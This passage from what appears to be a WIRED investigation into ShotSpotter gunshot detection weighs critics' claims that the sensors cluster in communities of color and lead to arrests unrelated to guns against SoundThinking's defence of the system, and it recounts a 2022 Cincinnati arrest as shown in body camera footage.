Chris Baumohl, an EPIC Law Fellow and coauthor of the petition to the DOJ, tells WIRED that our findings confirm what the nonprofit wrote in their petition in September: that ShotSpotter surveillance disproportionately occurs in communities of color. He also alleges that the technology primes police to go into minority communities believing that shots are fired, whether accurate or not. The result, Baumohl argues, is that community members are more likely to be picked up on bench warrants, misdemeanors, and for other reasons unrelated to guns.

In February, a leaked internal report from the State's Attorney’s Office in Illinois’ Cook County, where Chicago is located, found that nearly a third of arrests stemming from a ShotSpotter alert had nothing to do with a gun, Baumohl points out. On February 13, Chicago mayor Brandon Johnson, a vocal critic of ShotSpotter, said the city won't renew its contract with SoundThinking.

According to SoundThinking’s Chittum, the idea that police show up to ShotSpotter alerts ready to make arrests is speculation based on a few high-profile incidents. Instead, he argues that ShotSpotter provides law enforcement with accurate data to engage the community safely. “It allows police to knock on a door and tell residents, ‘Hey, we got a report of gunfire, we are just checking to see if everyone is OK. Did you hear anything? Did you see anything? If you do, please call us; we care, and we’ll come.’”

Ultimately, Chittum argues, ShotSpotter is simply a tool. When used correctly it can help police-community relations. “It’s up to the police to decide how they use it,” he says.

But what happens on the ground often paints a more complicated picture than what Chittum describes. WIRED reviewed body camera footage and police records of a 2022 ShotSpotter arrest in Cincinnati. According to the records, at 8:21 pm on New Year's Eve, police officers were dispatched to an area where two loud sounds were picked up by SoundThinking sensors. When the officers arrived, they quickly detained a tall man in a blue hoodie and black jacket who was standing near the corner where the technology had indicated gunfire.

According to police records, there were nine officers on the scene that night. Body camera footage shows one of the officers rifling through the man’s pockets as others milled around. Some pointed their flashlights at the ground or in the windows of parked cars. Others chatted, speculating about the potential whereabouts of bullet casings.

“I’m glad we could come out and help,” a sergeant watching the man being searched tells the officer standing next to him.

Police never found a bullet casing, gun, or bullet hole. They arrested the man anyway. After running his name through their on-car computer, they discovered he had warrants out for his arrest. He had failed to appear in court for traffic violations.

_Additional data analysis by Matt Casey, data science content lead at Snorkel AI, a firm that helps companies with AI projects and builds custom AI with its data development platform._

_Updated 2/23/2024, 12:15 pm EST to clarify that the list of sensors included in the document WIRED obtained may not include every ShotSpotter microphone._

Tag

#auth